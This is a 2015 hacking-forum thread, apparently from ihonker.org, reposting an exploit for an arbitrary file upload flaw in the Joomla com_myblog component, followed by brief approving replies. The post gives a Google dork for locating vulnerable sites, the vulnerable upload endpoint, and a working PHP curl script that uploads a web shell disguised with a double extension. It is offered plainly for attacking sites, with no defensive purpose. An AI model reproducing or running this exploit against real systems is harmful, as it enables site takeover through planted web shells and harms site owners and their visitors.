90_ 发表于 2015-7-21 17:09:25

Joomla com_Myblog Arbitrary文件上传漏洞

本帖最后由 90_ 于 2015-7-21 17:11 编辑

[+]   Title : Joomla com_Myblog Exploit Arbitrary File Upload Vulnerability

----------------------------------------------------
[+]   Author: Back-DOOR
----------------------------------------------------
[+]   Exploit by   :   Back-DOOR
[+]   Dork google   :inurl:/components/com_myblog/
----------------------------------------------------
[+]   Contact:https://facebook.com/Backdoor.ma
[+]   Like:https://fb.com/BaCkDoOr.HaCkInG
[+]   youtube chaine : https://www.youtube.com/user/BackDOOR8100/videos


exploit Vul : /index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }

Exploiter :
***************************************************************************************************
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
***************************************************************************************************

菜鸟小羽 发表于 2015-7-23 15:49:12

支持中国红客联盟(ihonker.org)

菜鸟小羽 发表于 2015-7-24 17:36:52

还是不错的哦,顶了

asion 发表于 2015-7-25 15:41:16

支持,看起来不错呢!

Sty,涛 发表于 2015-7-25 23:50:48

还是不错的哦,顶了

yusiii 发表于 2015-7-26 12:32:48

还是不错的哦,顶了

08-wh 发表于 2015-7-27 05:22:18

支持中国红客联盟(ihonker.org)

xiaoqqf4 发表于 2015-7-27 08:24:44

支持,看起来不错呢!

Sty,涛 发表于 2015-7-27 19:24:55

还是不错的哦,顶了

r00tc4 发表于 2015-7-28 07:08:34

还是不错的哦,顶了
页: [1] 2 3
查看完整版本: Joomla com_Myblog Arbitrary文件上传漏洞